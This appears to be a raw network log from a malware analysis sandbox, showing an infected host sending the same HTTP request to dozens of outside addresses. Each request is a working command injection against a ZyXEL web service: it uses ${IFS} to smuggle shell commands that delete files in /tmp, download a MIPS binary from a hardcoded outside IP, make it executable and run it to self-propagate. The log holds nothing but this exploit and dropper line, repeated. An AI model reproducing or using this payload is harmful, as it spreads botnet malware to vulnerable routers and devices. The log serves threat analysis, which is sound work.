                                                Jan 12, 2024 18:24:44.054946899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6364192.168.2.133722676.208.39.112443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055018902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6365192.168.2.1334372186.174.22.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055038929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6366192.168.2.1347490179.209.175.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055095911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6367192.168.2.134172863.103.18.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055130959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6368192.168.2.13596644.200.127.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055155993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6369192.168.2.1345456161.247.40.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055187941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6370192.168.2.1339212151.219.223.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055236101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6371192.168.2.1341606113.104.82.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055264950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6372192.168.2.13454268.104.153.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055313110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6373192.168.2.1358262149.217.54.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055356979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6374192.168.2.1358888182.103.191.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055396080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6375192.168.2.1343684154.224.49.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055423975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6376192.168.2.1351798196.240.145.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055474997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6377192.168.2.133677873.39.183.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055532932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6378192.168.2.134590431.237.152.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055567026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6379192.168.2.1341190222.107.34.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055602074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6380192.168.2.133698245.173.52.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055634975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6381192.168.2.135952231.166.93.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055679083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6382192.168.2.1347448118.230.243.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055705070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6383192.168.2.1359808159.179.151.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055737972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6384192.168.2.1346378131.79.24.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055777073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6385192.168.2.1335354129.156.241.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055835009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6386192.168.2.1345104222.107.25.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055880070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6387192.168.2.1337726159.48.109.107443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055891991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6388192.168.2.133986087.99.133.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055928946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6389192.168.2.13607185.81.216.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.055955887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6390192.168.2.1346722140.9.101.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056016922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6391192.168.2.1346224103.31.215.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056060076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6392192.168.2.1352046182.138.102.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056098938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6393192.168.2.133497664.44.63.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056128979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6394192.168.2.1357088163.29.196.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056169987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6395192.168.2.1352308116.132.250.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056200027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6396192.168.2.1338434158.49.171.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056251049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6397192.168.2.133940037.114.253.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056284904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6398192.168.2.1352226219.162.153.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056323051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6399192.168.2.134500687.191.79.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056374073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6400192.168.2.133875085.235.250.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056401968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6401192.168.2.1337220124.155.124.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056451082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6402192.168.2.1348940157.209.183.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056489944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6403192.168.2.1357146123.96.96.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056521893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6404192.168.2.1351184152.116.166.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056560993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6405192.168.2.1353382173.89.189.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056615114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6406192.168.2.134929039.97.22.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056658983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6407192.168.2.1336054166.91.141.115443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056689978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6408192.168.2.134323883.94.66.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056741953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6409192.168.2.1346032192.85.67.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056786060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6410192.168.2.1355594112.12.144.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056809902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6411192.168.2.1357052124.29.175.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056866884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6412192.168.2.1350660115.210.19.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056891918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6413192.168.2.135767668.164.251.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056936026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6414192.168.2.1334132205.229.66.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.056977987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6415192.168.2.134265288.171.212.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057005882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6416192.168.2.1333482194.201.158.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057048082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6417192.168.2.1342676213.159.108.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057071924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6418192.168.2.1358400163.238.223.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057126999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6419192.168.2.1345544119.26.197.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057167053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6420192.168.2.1347874190.84.210.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057204962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6421192.168.2.1358316167.41.179.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057240009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6422192.168.2.13540688.217.176.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057285070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6423192.168.2.1340302169.88.239.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057321072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6424192.168.2.134198848.209.11.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057348013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6425192.168.2.133872873.252.67.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:44.057398081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6426192.168.2.1350518216.231.109.41443
                                                TimestampBytes transferredDirectionData
